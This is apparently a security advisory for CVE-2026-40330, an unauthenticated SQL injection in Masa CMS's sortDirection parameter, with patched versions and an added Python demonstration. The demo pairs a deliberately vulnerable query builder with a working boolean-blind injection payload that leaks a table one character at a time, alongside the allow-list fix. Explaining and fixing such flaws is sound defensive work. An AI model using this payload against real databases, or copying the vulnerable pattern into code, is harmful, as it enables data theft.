PT-2026-37236 · Masacms · Masacms
Guustnieuwenhuis · Published 2026-05-05 · Updated 2026-05-05
CVE-2026-40330 · CVSS v4.0 9.3 (Critical)
| Vector | AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X |
Name of the Vulnerable Software and Affected Versions
Masa CMS versions 7.2.0 through 7.2.9
Masa CMS versions 7.3.0 through 7.3.14
Masa CMS versions 7.4.0 through 7.4.9
Masa CMS versions 7.5.0 through 7.5.2
Description
A SQL injection issue exists in the beanFeed.cfc component, in its getQuery() function. The sortDirection parameter is concatenated directly into the SQL query without validation or parameterization, allowing an unauthenticated remote attacker to extract sensitive information, modify or delete database records, or potentially achieve remote code execution on the database server. Because a sort direction (ASC or DESC) is an SQL keyword rather than a bound value, it cannot be passed through cfqueryparam; the correct fix is to validate it against that allow-list before it reaches the query.
Recommendations
Update versions 7.2.0 through 7.2.9 to 7.2.10.
Update versions 7.3.0 through 7.3.14 to 7.3.15.
Update versions 7.4.0 through 7.4.9 to 7.4.10.
Update versions 7.5.0 through 7.5.2 to 7.5.3.
Restrict access to the beanFeed.cfc component.
Until the update is applied, block or strip the sortDirection parameter from requests that reach the affected component (for example at a reverse proxy or WAF).
Fix
RCE
SQL injection
Affected Products
Masacms
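The following is an added example, not Masa CMS code and not the actual beanFeed.cfc query: a constructed Python model of the bug class described above (a caller-supplied sort direction spliced into SQL) next to the allow-list check that fixes it. The table and column names (feed_items, secrets, token) and the in-memory SQLite database are assumptions made for the demonstration; the parameter name sort_direction mirrors the page's sortDirection. It also shows why the bug is exploitable even though only ASC/DESC is expected there: an injected LIMIT whose value depends on a guess turns the row count into a boolean oracle that leaks another table one character at a time.

```python
# Added example, not Masa CMS code: a constructed model of the bug class in
# CVE-2026-40330 (a sort direction concatenated into SQL) and of the
# allow-list check that fixes it. Table/column names are assumptions.
import sqlite3


def make_db() -> sqlite3.Connection:
    """Build a constructed in-memory database standing in for the CMS schema."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE feed_items (id INTEGER PRIMARY KEY, title TEXT);
        INSERT INTO feed_items (title) VALUES ('first'), ('second'), ('third');
        CREATE TABLE secrets (id INTEGER PRIMARY KEY, token TEXT);
        INSERT INTO secrets (token) VALUES ('s3cr3t');
        """
    )
    return conn


def vulnerable_feed_query(conn, sort_direction):
    """Vulnerable pattern: sort_direction is spliced into the statement verbatim."""
    sql = "SELECT id, title FROM feed_items ORDER BY id " + sort_direction
    return conn.execute(sql).fetchall()


def hardened_feed_query(conn, sort_direction):
    """Fixed pattern: ASC/DESC is an SQL keyword, so it cannot be bound as a
    parameter; validate it against an allow-list and reject anything else."""
    direction = sort_direction.strip().upper()
    if direction not in ("ASC", "DESC"):
        raise ValueError(f"invalid sort direction: {sort_direction!r}")
    sql = f"SELECT id, title FROM feed_items ORDER BY id {direction}"
    return conn.execute(sql).fetchall()


ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"


def blind_extract_token(conn, query_fn, max_len=32):
    """Boolean-blind extraction through the sort direction: each payload
    appends a LIMIT whose value depends on a guess about secrets.token, so the
    number of rows returned (1 vs 3) leaks one character per correct guess."""
    token = ""
    for pos in range(1, max_len + 1):
        for ch in ALPHABET:
            payload = (
                f"ASC LIMIT (SELECT CASE WHEN substr(token, {pos}, 1) = '{ch}' "
                f"THEN 1 ELSE 3 END FROM secrets)"
            )
            if len(query_fn(conn, payload)) == 1:
                token += ch
                break
        else:
            break  # no character matched at this position: end of token
    return token


def injection_rejected(conn, query_fn):
    """True if query_fn refuses the injection payload instead of running it."""
    try:
        blind_extract_token(conn, query_fn, max_len=1)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("hardened DESC:", hardened_feed_query(db, "desc"))
    print("leaked via vulnerable builder:", blind_extract_token(db, vulnerable_feed_query))
    print("hardened builder rejects payload:", injection_rejected(db, hardened_feed_query))
```

The hardened builder still interpolates a string into the SQL, which is unavoidable for ORDER BY direction; what makes it safe is that the only strings that can reach the query are the two literals ASC and DESC. The same allow-list approach applies to sort column names.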